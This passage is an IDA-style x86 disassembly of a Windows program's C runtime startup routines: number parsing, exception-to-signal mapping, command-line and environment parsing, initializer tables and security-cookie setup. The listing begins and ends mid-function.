or [ebp+arg_10], 2
jmp short loc_40A877
; ---------------------------------------------------------------------------
loc_40A872: ; CODE XREF: sub_40A7C0+AA�j
cmp bl, 2Bh
jnz short loc_40A87A
loc_40A877: ; CODE XREF: sub_40A7C0+B0�j
mov bl, [edi]
inc edi
loc_40A87A: ; CODE XREF: sub_40A7C0+B5�j
mov eax, [ebp+arg_C]
test eax, eax
jl loc_40A9CE
cmp eax, 1
jz loc_40A9CE
cmp eax, 24h
jg loc_40A9CE
test eax, eax
jnz short loc_40A8C5
cmp bl, 30h
jz short loc_40A8A9
mov [ebp+arg_C], 0Ah
jmp short loc_40A8DD
; ---------------------------------------------------------------------------
loc_40A8A9: ; CODE XREF: sub_40A7C0+DE�j
mov al, [edi]
cmp al, 78h
jz short loc_40A8BC
cmp al, 58h
jz short loc_40A8BC
mov [ebp+arg_C], 8
jmp short loc_40A8DD
; ---------------------------------------------------------------------------
loc_40A8BC: ; CODE XREF: sub_40A7C0+ED�j
; sub_40A7C0+F1�j
mov [ebp+arg_C], 10h
jmp short loc_40A8CF
; ---------------------------------------------------------------------------
loc_40A8C5: ; CODE XREF: sub_40A7C0+D9�j
cmp eax, 10h
jnz short loc_40A8DD
cmp bl, 30h
jnz short loc_40A8DD
loc_40A8CF: ; CODE XREF: sub_40A7C0+103�j
mov al, [edi]
cmp al, 78h
jz short loc_40A8D9
cmp al, 58h
jnz short loc_40A8DD
loc_40A8D9: ; CODE XREF: sub_40A7C0+113�j
inc edi
mov bl, [edi]
inc edi
loc_40A8DD: ; CODE XREF: sub_40A7C0+E7�j
; sub_40A7C0+FA�j ...
mov esi, [ecx+0C8h]
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_C]
loc_40A8EB: ; CODE XREF: sub_40A7C0+19D�j
movzx ecx, bl
movzx ecx, word ptr [esi+ecx*2]
test cl, 4
jz short loc_40A8FF
movsx ecx, bl
sub ecx, 30h
jmp short loc_40A919
; ---------------------------------------------------------------------------
loc_40A8FF: ; CODE XREF: sub_40A7C0+135�j
test cx, 103h
jz short loc_40A937
mov cl, bl
sub cl, 61h
cmp cl, 19h
movsx ecx, bl
ja short loc_40A916
sub ecx, 20h
loc_40A916: ; CODE XREF: sub_40A7C0+151�j
add ecx, 0FFFFFFC9h
loc_40A919: ; CODE XREF: sub_40A7C0+13D�j
cmp ecx, [ebp+arg_C]
jnb short loc_40A937
or [ebp+arg_10], 8
cmp [ebp+var_4], eax
jb short loc_40A94E
jnz short loc_40A92D
cmp ecx, edx
jbe short loc_40A94E
loc_40A92D: ; CODE XREF: sub_40A7C0+167�j
or [ebp+arg_10], 4
cmp [ebp+arg_8], 0
jnz short loc_40A95A
loc_40A937: ; CODE XREF: sub_40A7C0+144�j
; sub_40A7C0+15C�j
mov eax, [ebp+arg_10]
dec edi
test al, 8
jnz short loc_40A95F
cmp [ebp+arg_8], 0
jz short loc_40A948
mov edi, [ebp+arg_4]
loc_40A948: ; CODE XREF: sub_40A7C0+183�j
and [ebp+var_4], 0
jmp short loc_40A9AA
; ---------------------------------------------------------------------------
loc_40A94E: ; CODE XREF: sub_40A7C0+165�j
; sub_40A7C0+16B�j
mov ebx, [ebp+var_4]
imul ebx, [ebp+arg_C]
add ebx, ecx
mov [ebp+var_4], ebx
loc_40A95A: ; CODE XREF: sub_40A7C0+175�j
mov bl, [edi]
inc edi
jmp short loc_40A8EB
; ---------------------------------------------------------------------------
loc_40A95F: ; CODE XREF: sub_40A7C0+17D�j
test al, 4
mov esi, 7FFFFFFFh
jnz short loc_40A983
test al, 1
jnz short loc_40A9AA
and eax, 2
jz short loc_40A97A
cmp [ebp+var_4], 80000000h
ja short loc_40A983
loc_40A97A: ; CODE XREF: sub_40A7C0+1AF�j
test eax, eax
jnz short loc_40A9AA
cmp [ebp+var_4], esi
jbe short loc_40A9AA
loc_40A983: ; CODE XREF: sub_40A7C0+1A6�j
; sub_40A7C0+1B8�j
call sub_4057D3
test byte ptr [ebp+arg_10], 1
mov dword ptr [eax], 22h
jz short loc_40A99A
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_40A9AA
; ---------------------------------------------------------------------------
loc_40A99A: ; CODE XREF: sub_40A7C0+1D2�j
mov al, byte ptr [ebp+arg_10]
and al, 2
neg al
sbb eax, eax
neg eax
add eax, esi
mov [ebp+var_4], eax
loc_40A9AA: ; CODE XREF: sub_40A7C0+18C�j
; sub_40A7C0+1AA�j ...
mov eax, [ebp+arg_8]
test eax, eax
jz short loc_40A9B3
mov [eax], edi
loc_40A9B3: ; CODE XREF: sub_40A7C0+1EF�j
test byte ptr [ebp+arg_10], 2
jz short loc_40A9BC
neg [ebp+var_4]
loc_40A9BC: ; CODE XREF: sub_40A7C0+1F7�j
cmp [ebp+var_8], 0
jz short loc_40A9C9
mov eax, [ebp+var_C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40A9C9: ; CODE XREF: sub_40A7C0+200�j
mov eax, [ebp+var_4]
jmp short loc_40A9E6
; ---------------------------------------------------------------------------
loc_40A9CE: ; CODE XREF: sub_40A7C0+BF�j
; sub_40A7C0+C8�j ...
mov eax, [ebp+arg_8]
test eax, eax
jz short loc_40A9D7
mov [eax], esi
loc_40A9D7: ; CODE XREF: sub_40A7C0+213�j
cmp [ebp+var_8], 0
jz short loc_40A9E4
mov eax, [ebp+var_C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40A9E4: ; CODE XREF: sub_40A7C0+21B�j
xor eax, eax
loc_40A9E6: ; CODE XREF: sub_40A7C0+20C�j
pop ebx
loc_40A9E7: ; CODE XREF: sub_40A7C0+4C�j
pop edi
pop esi
leave
retn
sub_40A7C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A9EB proc near ; CODE XREF: sub_403EBD+8�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
xor eax, eax
cmp ds:dword_425DE0, eax
push eax
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
jnz short loc_40AA09
push offset off_423680
jmp short loc_40AA0A
; ---------------------------------------------------------------------------
loc_40AA09: ; CODE XREF: sub_40A9EB+15�j
push eax
loc_40AA0A: ; CODE XREF: sub_40A9EB+1C�j
call sub_40A7C0
add esp, 14h
pop ebp
retn
sub_40A9EB endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AA15 proc near ; CODE XREF: .kSjx934:004040D1�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push esi
call sub_40531A
mov esi, eax
test esi, esi
jnz short loc_40AA34
push [ebp+arg_4]
call ds:dword_41D198 ; UnhandledExceptionFilter
jmp loc_40AB81
; ---------------------------------------------------------------------------
loc_40AA34: ; CODE XREF: sub_40AA15+F�j
mov edx, [esi+5Ch]
mov eax, ds:dword_423E44
push edi
mov edi, [ebp+arg_0]
mov ecx, edx
push ebx
loc_40AA43: ; CODE XREF: sub_40AA15+3E�j
cmp [ecx], edi
jz short loc_40AA55
mov ebx, eax
imul ebx, 0Ch
add ecx, 0Ch
add ebx, edx
cmp ecx, ebx
jb short loc_40AA43
loc_40AA55: ; CODE XREF: sub_40AA15+30�j
imul eax, 0Ch
add eax, edx
cmp ecx, eax
jnb short loc_40AA66
cmp [ecx], edi
jnz short loc_40AA66
mov eax, ecx
jmp short loc_40AA68
; ---------------------------------------------------------------------------
loc_40AA66: ; CODE XREF: sub_40AA15+47�j
; sub_40AA15+4B�j
xor eax, eax
loc_40AA68: ; CODE XREF: sub_40AA15+4F�j
test eax, eax
jz short loc_40AA76
mov ebx, [eax+8]
test ebx, ebx
mov [ebp+var_4], ebx
jnz short loc_40AA84
loc_40AA76: ; CODE XREF: sub_40AA15+55�j
push [ebp+arg_4]
call ds:dword_41D198 ; UnhandledExceptionFilter
jmp loc_40AB7F
; ---------------------------------------------------------------------------
loc_40AA84: ; CODE XREF: sub_40AA15+5F�j
cmp ebx, 5
jnz short loc_40AA95
and dword ptr [eax+8], 0
xor eax, eax
inc eax
jmp loc_40AB7F
; ---------------------------------------------------------------------------
loc_40AA95: ; CODE XREF: sub_40AA15+72�j
cmp ebx, 1
jz loc_40AB7C
mov ecx, [esi+60h]
mov [ebp+var_8], ecx
mov ecx, [ebp+arg_4]
mov [esi+60h], ecx
mov ecx, [eax+4]
cmp ecx, 8
jnz loc_40AB6E
mov ecx, ds:dword_423E38
mov edi, ds:dword_423E3C
mov edx, ecx
add edi, ecx
cmp edx, edi
jge short loc_40AAEE
imul ecx, 0Ch
loc_40AACD: ; CODE XREF: sub_40AA15+D4�j
mov edi, [esi+5Ch]
and dword ptr [ecx+edi+8], 0
mov edi, ds:dword_423E38
mov ebx, ds:dword_423E3C
inc edx
add ebx, edi
add ecx, 0Ch
cmp edx, ebx
jl short loc_40AACD
mov ebx, [ebp+var_4]
loc_40AAEE: ; CODE XREF: sub_40AA15+B3�j
mov eax, [eax]
cmp eax, 0C000008Eh
mov edi, [esi+64h]
jnz short loc_40AB03
mov dword ptr [esi+64h], 83h
jmp short loc_40AB61
; ---------------------------------------------------------------------------
loc_40AB03: ; CODE XREF: sub_40AA15+E3�j
cmp eax, 0C0000090h
jnz short loc_40AB13
mov dword ptr [esi+64h], 81h
jmp short loc_40AB61
; ---------------------------------------------------------------------------
loc_40AB13: ; CODE XREF: sub_40AA15+F3�j
cmp eax, 0C0000091h
jnz short loc_40AB23
mov dword ptr [esi+64h], 84h
jmp short loc_40AB61
; ---------------------------------------------------------------------------
loc_40AB23: ; CODE XREF: sub_40AA15+103�j
cmp eax, 0C0000093h
jnz short loc_40AB33
mov dword ptr [esi+64h], 85h
jmp short loc_40AB61
; ---------------------------------------------------------------------------
loc_40AB33: ; CODE XREF: sub_40AA15+113�j
cmp eax, 0C000008Dh
jnz short loc_40AB43
mov dword ptr [esi+64h], 82h
jmp short loc_40AB61
; ---------------------------------------------------------------------------
loc_40AB43: ; CODE XREF: sub_40AA15+123�j
cmp eax, 0C000008Fh
jnz short loc_40AB53
mov dword ptr [esi+64h], 86h
jmp short loc_40AB61
; ---------------------------------------------------------------------------
loc_40AB53: ; CODE XREF: sub_40AA15+133�j
cmp eax, 0C0000092h
jnz short loc_40AB61
mov dword ptr [esi+64h], 8Ah
loc_40AB61: ; CODE XREF: sub_40AA15+EC�j
; sub_40AA15+FC�j ...
push dword ptr [esi+64h]
push 8
call ebx
pop ecx
mov [esi+64h], edi
jmp short loc_40AB75
; ---------------------------------------------------------------------------
loc_40AB6E: ; CODE XREF: sub_40AA15+9B�j
and dword ptr [eax+8], 0
push ecx
call ebx
loc_40AB75: ; CODE XREF: sub_40AA15+157�j
mov eax, [ebp+var_8]
pop ecx
mov [esi+60h], eax
loc_40AB7C: ; CODE XREF: sub_40AA15+83�j
or eax, 0FFFFFFFFh
loc_40AB7F: ; CODE XREF: sub_40AA15+6A�j
; sub_40AA15+7B�j
pop ebx
pop edi
loc_40AB81: ; CODE XREF: sub_40AA15+1A�j
pop esi
leave
retn
sub_40AA15 endp
; =============== S U B R O U T I N E =======================================
sub_40AB84 proc near ; CODE XREF: .kSjx934:loc_40408E�p
push esi
push edi
xor edi, edi
cmp ds:dword_434DD4, edi
jnz short loc_40AB95
call sub_404E03
loc_40AB95: ; CODE XREF: sub_40AB84+A�j
mov esi, ds:dword_434DF8
test esi, esi
jnz short loc_40ABA4
mov esi, offset word_41D482
loc_40ABA4: ; CODE XREF: sub_40AB84+19�j
; sub_40AB84+4B�j
mov al, [esi]
cmp al, 20h
ja short loc_40ABB2
test al, al
jz short loc_40ABDC
test edi, edi
jz short loc_40ABD6
loc_40ABB2: ; CODE XREF: sub_40AB84+24�j
cmp al, 22h
jnz short loc_40ABBF
xor ecx, ecx
test edi, edi
setz cl
mov edi, ecx
loc_40ABBF: ; CODE XREF: sub_40AB84+30�j
movzx eax, al
push eax
call sub_41019D
test eax, eax
pop ecx
jz short loc_40ABCE
inc esi
loc_40ABCE: ; CODE XREF: sub_40AB84+47�j
inc esi
jmp short loc_40ABA4
; ---------------------------------------------------------------------------
loc_40ABD1: ; CODE XREF: sub_40AB84+56�j
cmp al, 20h
ja short loc_40ABDC
inc esi
loc_40ABD6: ; CODE XREF: sub_40AB84+2C�j
mov al, [esi]
test al, al
jnz short loc_40ABD1
loc_40ABDC: ; CODE XREF: sub_40AB84+28�j
; sub_40AB84+4F�j
pop edi
mov eax, esi
pop esi
retn
sub_40AB84 endp
; =============== S U B R O U T I N E =======================================
sub_40ABE1 proc near ; CODE XREF: .kSjx934:loc_40406B�p
push ebx
xor ebx, ebx
cmp ds:dword_434DD4, ebx
push esi
push edi
jnz short loc_40ABF3
call sub_404E03
loc_40ABF3: ; CODE XREF: sub_40ABE1+B�j
mov esi, ds:dword_425A94
xor edi, edi
cmp esi, ebx
jnz short loc_40AC17
loc_40ABFF: ; CODE XREF: sub_40ABE1+51�j
or eax, 0FFFFFFFFh
jmp loc_40ACA2
; ---------------------------------------------------------------------------
loc_40AC07: ; CODE XREF: sub_40ABE1+3A�j
cmp al, 3Dh
jz short loc_40AC0C
inc edi
loc_40AC0C: ; CODE XREF: sub_40ABE1+28�j
push esi
call sub_404130
pop ecx
lea esi, [esi+eax+1]
loc_40AC17: ; CODE XREF: sub_40ABE1+1C�j
mov al, [esi]
cmp al, bl
jnz short loc_40AC07
push 4
inc edi
push edi
call sub_40777A
mov edi, eax
cmp edi, ebx
pop ecx
pop ecx
mov ds:dword_425F98, edi
jz short loc_40ABFF
mov esi, ds:dword_425A94
push ebp
jmp short loc_40AC7D
; ---------------------------------------------------------------------------
loc_40AC3D: ; CODE XREF: sub_40ABE1+9E�j
push esi
call sub_404130
mov ebp, eax
inc ebp
cmp byte ptr [esi], 3Dh
pop ecx
jz short loc_40AC7B
push 1
push ebp
call sub_40777A
cmp eax, ebx
pop ecx
pop ecx
mov [edi], eax
jz short loc_40ACA6
push esi
push ebp
push eax
call sub_4076D5
add esp, 0Ch
test eax, eax
jz short loc_40AC78
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402E3D
add esp, 14h
loc_40AC78: ; CODE XREF: sub_40ABE1+88�j
add edi, 4
loc_40AC7B: ; CODE XREF: sub_40ABE1+69�j
add esi, ebp
loc_40AC7D: ; CODE XREF: sub_40ABE1+5A�j
cmp [esi], bl
jnz short loc_40AC3D
push ds:dword_425A94
call sub_403603
mov ds:dword_425A94, ebx
mov [edi], ebx
mov ds:dword_434DC8, 1
xor eax, eax
loc_40ACA0: ; CODE XREF: sub_40ABE1+D9�j
pop ecx
pop ebp
loc_40ACA2: ; CODE XREF: sub_40ABE1+21�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40ACA6: ; CODE XREF: sub_40ABE1+79�j
push ds:dword_425F98
call sub_403603
mov ds:dword_425F98, ebx
or eax, 0FFFFFFFFh
jmp short loc_40ACA0
sub_40ABE1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ACBC proc near ; CODE XREF: sub_40AE54+55�p
; sub_40AE54+96�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_8]
push ebx
xor eax, eax
cmp [ebp+arg_0], eax
push esi
mov [edi], eax
mov esi, edx
mov edx, [ebp+arg_4]
mov dword ptr [ecx], 1
jz short loc_40ACE2
mov ebx, [ebp+arg_0]
add [ebp+arg_0], 4
mov [ebx], edx
loc_40ACE2: ; CODE XREF: sub_40ACBC+1B�j
mov [ebp+var_4], eax
loc_40ACE5: ; CODE XREF: sub_40ACBC+7E�j
; sub_40ACBC+88�j
cmp byte ptr [esi], 22h
jnz short loc_40ACFA
xor eax, eax
cmp [ebp+var_4], eax
mov bl, 22h
setz al
inc esi
mov [ebp+var_4], eax
jmp short loc_40AD36
; ---------------------------------------------------------------------------
loc_40ACFA: ; CODE XREF: sub_40ACBC+2C�j
inc dword ptr [edi]
test edx, edx
jz short loc_40AD08
mov al, [esi]
mov [edx], al
inc edx
mov [ebp+arg_4], edx
loc_40AD08: ; CODE XREF: sub_40ACBC+42�j
mov bl, [esi]
movzx eax, bl
push eax
inc esi
call sub_41019D
test eax, eax
pop ecx
jz short loc_40AD2C
inc dword ptr [edi]
cmp [ebp+arg_4], 0
jz short loc_40AD2B
mov ecx, [ebp+arg_4]
mov al, [esi]
inc [ebp+arg_4]
mov [ecx], al
loc_40AD2B: ; CODE XREF: sub_40ACBC+63�j
inc esi
loc_40AD2C: ; CODE XREF: sub_40ACBC+5B�j
test bl, bl
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_8]
jz short loc_40AD68
loc_40AD36: ; CODE XREF: sub_40ACBC+3C�j
cmp [ebp+var_4], 0
jnz short loc_40ACE5
cmp bl, 20h
jz short loc_40AD46
cmp bl, 9
jnz short loc_40ACE5
loc_40AD46: ; CODE XREF: sub_40ACBC+83�j
test edx, edx
jz short loc_40AD4E
mov byte ptr [edx-1], 0
loc_40AD4E: ; CODE XREF: sub_40ACBC+8C�j
; sub_40ACBC+AD�j
and [ebp+var_4], 0
loc_40AD52: ; CODE XREF: sub_40ACBC+183�j
cmp byte ptr [esi], 0
jz loc_40AE44
loc_40AD5B: ; CODE XREF: sub_40ACBC+AA�j
mov al, [esi]
cmp al, 20h
jz short loc_40AD65
cmp al, 9
jnz short loc_40AD6B
loc_40AD65: ; CODE XREF: sub_40ACBC+A3�j
inc esi
jmp short loc_40AD5B
; ---------------------------------------------------------------------------
loc_40AD68: ; CODE XREF: sub_40ACBC+78�j
dec esi
jmp short loc_40AD4E
; ---------------------------------------------------------------------------
loc_40AD6B: ; CODE XREF: sub_40ACBC+A7�j
cmp byte ptr [esi], 0
jz loc_40AE44
cmp [ebp+arg_0], 0
jz short loc_40AD83
mov eax, [ebp+arg_0]
add [ebp+arg_0], 4
mov [eax], edx
loc_40AD83: ; CODE XREF: sub_40ACBC+BC�j
inc dword ptr [ecx]
loc_40AD85: ; CODE XREF: sub_40ACBC+16E�j
xor ebx, ebx
inc ebx
xor ecx, ecx
jmp short loc_40AD8E
; ---------------------------------------------------------------------------
loc_40AD8C: ; CODE XREF: sub_40ACBC+D5�j
inc esi
inc ecx
loc_40AD8E: ; CODE XREF: sub_40ACBC+CE�j
cmp byte ptr [esi], 5Ch
jz short loc_40AD8C
cmp byte ptr [esi], 22h
jnz short loc_40ADBE
test cl, 1
jnz short loc_40ADBC
cmp [ebp+var_4], 0
jz short loc_40ADAF
lea eax, [esi+1]
cmp byte ptr [eax], 22h
jnz short loc_40ADAF
mov esi, eax
jmp short loc_40ADBC
; ---------------------------------------------------------------------------
loc_40ADAF: ; CODE XREF: sub_40ACBC+E5�j
; sub_40ACBC+ED�j
xor eax, eax
xor ebx, ebx
cmp [ebp+var_4], eax
setz al
mov [ebp+var_4], eax
loc_40ADBC: ; CODE XREF: sub_40ACBC+DF�j
; sub_40ACBC+F1�j
shr ecx, 1
loc_40ADBE: ; CODE XREF: sub_40ACBC+DA�j
test ecx, ecx
jz short loc_40ADD4
loc_40ADC2: ; CODE XREF: sub_40ACBC+113�j
dec ecx
test edx, edx
jz short loc_40ADCB
mov byte ptr [edx], 5Ch
inc edx
loc_40ADCB: ; CODE XREF: sub_40ACBC+109�j
inc dword ptr [edi]
test ecx, ecx
jnz short loc_40ADC2
mov [ebp+arg_4], edx
loc_40ADD4: ; CODE XREF: sub_40ACBC+104�j
mov al, [esi]
test al, al
jz short loc_40AE2F
cmp [ebp+var_4], 0
jnz short loc_40ADE8
cmp al, 20h
jz short loc_40AE2F
cmp al, 9
jz short loc_40AE2F
loc_40ADE8: ; CODE XREF: sub_40ACBC+122�j
test ebx, ebx
jz short loc_40AE29
test edx, edx
movsx eax, al
push eax
jz short loc_40AE17
call sub_41019D
test eax, eax
pop ecx
jz short loc_40AE0B
mov al, [esi]
mov ecx, [ebp+arg_4]
inc [ebp+arg_4]
mov [ecx], al
inc esi
inc dword ptr [edi]
loc_40AE0B: ; CODE XREF: sub_40ACBC+140�j
mov ecx, [ebp+arg_4]
mov al, [esi]
inc [ebp+arg_4]
mov [ecx], al
jmp short loc_40AE24
; ---------------------------------------------------------------------------
loc_40AE17: ; CODE XREF: sub_40ACBC+136�j
call sub_41019D
test eax, eax
pop ecx
jz short loc_40AE24
inc esi
inc dword ptr [edi]
loc_40AE24: ; CODE XREF: sub_40ACBC+159�j
; sub_40ACBC+163�j
inc dword ptr [edi]
mov edx, [ebp+arg_4]
loc_40AE29: ; CODE XREF: sub_40ACBC+12E�j
inc esi
jmp loc_40AD85
; ---------------------------------------------------------------------------
loc_40AE2F: ; CODE XREF: sub_40ACBC+11C�j
; sub_40ACBC+126�j ...
test edx, edx
jz short loc_40AE3A
mov byte ptr [edx], 0
inc edx
mov [ebp+arg_4], edx
loc_40AE3A: ; CODE XREF: sub_40ACBC+175�j
inc dword ptr [edi]
mov ecx, [ebp+arg_8]
jmp loc_40AD52
; ---------------------------------------------------------------------------
loc_40AE44: ; CODE XREF: sub_40ACBC+99�j
; sub_40ACBC+B2�j
mov eax, [ebp+arg_0]
test eax, eax
pop esi
pop ebx
jz short loc_40AE50
and dword ptr [eax], 0
loc_40AE50: ; CODE XREF: sub_40ACBC+18F�j
inc dword ptr [ecx]
leave
retn
sub_40ACBC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AE54 proc near ; CODE XREF: .kSjx934:0040405A�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
xor ebx, ebx
cmp ds:dword_434DD4, ebx
push esi
push edi
jnz short loc_40AE6C
call sub_404E03
loc_40AE6C: ; CODE XREF: sub_40AE54+11�j
push 104h
mov esi, offset dword_4262F8
push esi
push ebx
mov ds:byte_4263FC, bl
call ds:dword_41D060
mov eax, ds:dword_434DF8
cmp eax, ebx
mov ds:dword_425FA8, esi
jz short loc_40AE9A
cmp [eax], bl
mov [ebp+var_4], eax
jnz short loc_40AE9D
loc_40AE9A: ; CODE XREF: sub_40AE54+3D�j
mov [ebp+var_4], esi
loc_40AE9D: ; CODE XREF: sub_40AE54+44�j
mov edx, [ebp+var_4]
lea eax, [ebp+var_8]
push eax
push ebx
push ebx
lea edi, [ebp+var_C]
call sub_40ACBC
mov eax, [ebp+var_8]
add esp, 0Ch
cmp eax, 3FFFFFFFh
jnb short loc_40AF05
mov ecx, [ebp+var_C]
cmp ecx, 0FFFFFFFFh
jnb short loc_40AF05
mov edi, eax
shl edi, 2
lea eax, [edi+ecx]
cmp eax, ecx
jb short loc_40AF05
push eax
call sub_40773A
mov esi, eax
cmp esi, ebx
pop ecx
jz short loc_40AF05
mov edx, [ebp+var_4]
lea eax, [ebp+var_8]
push eax
add edi, esi
push edi
push esi
lea edi, [ebp+var_C]
call sub_40ACBC
mov eax, [ebp+var_8]
add esp, 0Ch
dec eax
mov ds:dword_425F8C, eax
mov ds:dword_425F90, esi
xor eax, eax
jmp short loc_40AF08
; ---------------------------------------------------------------------------
loc_40AF05: ; CODE XREF: sub_40AE54+65�j
; sub_40AE54+6D�j ...
or eax, 0FFFFFFFFh
loc_40AF08: ; CODE XREF: sub_40AE54+AF�j
pop edi
pop esi
pop ebx
leave
retn
sub_40AE54 endp
; =============== S U B R O U T I N E =======================================
sub_40AF0D proc near ; CODE XREF: .kSjx934:00404050�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
mov eax, ds:dword_426400
push ebx
push ebp
push esi
push edi
mov edi, ds:dword_41D134
xor ebx, ebx
xor esi, esi
cmp eax, ebx
push 2
pop ebp
jnz short loc_40AF56
call edi
mov esi, eax
cmp esi, ebx
jz short loc_40AF3D
mov ds:dword_426400, 1
jmp short loc_40AF5F
; ---------------------------------------------------------------------------
loc_40AF3D: ; CODE XREF: sub_40AF0D+22�j
call ds:dword_41D0F0
cmp eax, 78h
jnz short loc_40AF51
mov eax, ebp
mov ds:dword_426400, eax
jmp short loc_40AF56
; ---------------------------------------------------------------------------
loc_40AF51: ; CODE XREF: sub_40AF0D+39�j
mov eax, ds:dword_426400
loc_40AF56: ; CODE XREF: sub_40AF0D+1A�j
; sub_40AF0D+42�j
cmp eax, 1
jnz loc_40AFE3
loc_40AF5F: ; CODE XREF: sub_40AF0D+2E�j
cmp esi, ebx
jnz short loc_40AF72
call edi
mov esi, eax
cmp esi, ebx
jnz short loc_40AF72
loc_40AF6B: ; CODE XREF: sub_40AF0D+DC�j
; sub_40AF0D+E8�j ...
xor eax, eax
jmp loc_40B03B
; ---------------------------------------------------------------------------
loc_40AF72: ; CODE XREF: sub_40AF0D+54�j
; sub_40AF0D+5C�j
cmp [esi], bx
mov eax, esi
jz short loc_40AF87
loc_40AF79: ; CODE XREF: sub_40AF0D+71�j
; sub_40AF0D+78�j
add eax, ebp
cmp [eax], bx
jnz short loc_40AF79
add eax, ebp
cmp [eax], bx
jnz short loc_40AF79
loc_40AF87: ; CODE XREF: sub_40AF0D+6A�j
mov edi, ds:dword_41D138
push ebx
push ebx
push ebx
sub eax, esi
push ebx
sar eax, 1
inc eax
push eax
push esi
push ebx
push ebx
mov [esp+38h+var_4], eax
call edi
mov ebp, eax
cmp ebp, ebx
jz short loc_40AFD8
push ebp
call sub_40773A
cmp eax, ebx
pop ecx
mov [esp+18h+var_8], eax
jz short loc_40AFD8
push ebx
push ebx
push ebp
push eax
push [esp+28h+var_4]
push esi
push ebx
push ebx
call edi
test eax, eax
jnz short loc_40AFD4
push [esp+18h+var_8]
call sub_403603
pop ecx
mov [esp+18h+var_8], ebx
loc_40AFD4: ; CODE XREF: sub_40AF0D+B7�j
mov ebx, [esp+18h+var_8]
loc_40AFD8: ; CODE XREF: sub_40AF0D+97�j
; sub_40AF0D+A6�j
push esi
call ds:dword_41D13C
mov eax, ebx
jmp short loc_40B03B
; ---------------------------------------------------------------------------
loc_40AFE3: ; CODE XREF: sub_40AF0D+4C�j
cmp eax, ebp
jz short loc_40AFEB
cmp eax, ebx
jnz short loc_40AF6B
loc_40AFEB: ; CODE XREF: sub_40AF0D+D8�j
call ds:dword_41D140
mov esi, eax
cmp esi, ebx
jz loc_40AF6B
cmp [esi], bl
jz short loc_40B009
loc_40AFFF: ; CODE XREF: sub_40AF0D+F5�j
; sub_40AF0D+FA�j
inc eax
cmp [eax], bl
jnz short loc_40AFFF
inc eax
cmp [eax], bl
jnz short loc_40AFFF
loc_40B009: ; CODE XREF: sub_40AF0D+F0�j
sub eax, esi
inc eax
mov ebp, eax
push ebp
call sub_40773A
mov edi, eax
cmp edi, ebx
pop ecx
jnz short loc_40B027
push esi
call ds:dword_41D144
jmp loc_40AF6B
; ---------------------------------------------------------------------------
loc_40B027: ; CODE XREF: sub_40AF0D+10C�j
push ebp
push esi
push edi
call sub_407BF0
add esp, 0Ch
push esi
call ds:dword_41D144
mov eax, edi
loc_40B03B: ; CODE XREF: sub_40AF0D+60�j
; sub_40AF0D+D4�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
sub_40AF0D endp
; =============== S U B R O U T I N E =======================================
sub_40B042 proc near ; CODE XREF: .kSjx934:loc_40402C�p
push esi
push edi
mov eax, offset dword_421294
mov edi, offset dword_421294
cmp eax, edi
mov esi, eax
jnb short loc_40B063
loc_40B054: ; CODE XREF: sub_40B042+1F�j
mov eax, [esi]
test eax, eax
jz short loc_40B05C
call eax
loc_40B05C: ; CODE XREF: sub_40B042+16�j
add esi, 4
cmp esi, edi
jb short loc_40B054
loc_40B063: ; CODE XREF: sub_40B042+10�j
pop edi
pop esi
retn
sub_40B042 endp
; =============== S U B R O U T I N E =======================================
sub_40B066 proc near ; DATA XREF: sub_407979+3F�o
push esi
push edi
mov eax, offset dword_42129C
mov edi, offset dword_42129C
cmp eax, edi
mov esi, eax
jnb short loc_40B087
loc_40B078: ; CODE XREF: sub_40B066+1F�j
mov eax, [esi]
test eax, eax
jz short loc_40B080
call eax
loc_40B080: ; CODE XREF: sub_40B066+16�j
add esi, 4
cmp esi, edi
jb short loc_40B078
loc_40B087: ; CODE XREF: sub_40B066+10�j
pop edi
pop esi
retn
sub_40B066 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B08A proc near ; CODE XREF: .kSjx934:00404118�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
mov eax, ds:dword_423064
and [ebp+var_8], 0
and [ebp+var_4], 0
push ebx
push edi
mov edi, 0BB40E64Eh
cmp eax, edi
mov ebx, 0FFFF0000h
jz short loc_40B0BA
test eax, ebx
jz short loc_40B0BA
not eax
mov ds:dword_423068, eax
jmp short loc_40B11A
; ---------------------------------------------------------------------------
loc_40B0BA: ; CODE XREF: sub_40B08A+21�j
; sub_40B08A+25�j
push esi
lea eax, [ebp+var_8]
push eax
call ds:dword_41D1A0
mov esi, [ebp+var_4]
xor esi, [ebp+var_8]
call ds:dword_41D194
xor esi, eax
call ds:dword_41D0E0
xor esi, eax
call ds:dword_41D108
xor esi, eax
lea eax, [ebp+var_10]
push eax
call ds:dword_41D058
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor esi, eax
cmp esi, edi
jnz short loc_40B100
mov esi, 0BB40E64Fh
jmp short loc_40B10B
; ---------------------------------------------------------------------------
loc_40B100: ; CODE XREF: sub_40B08A+6D�j
test esi, ebx
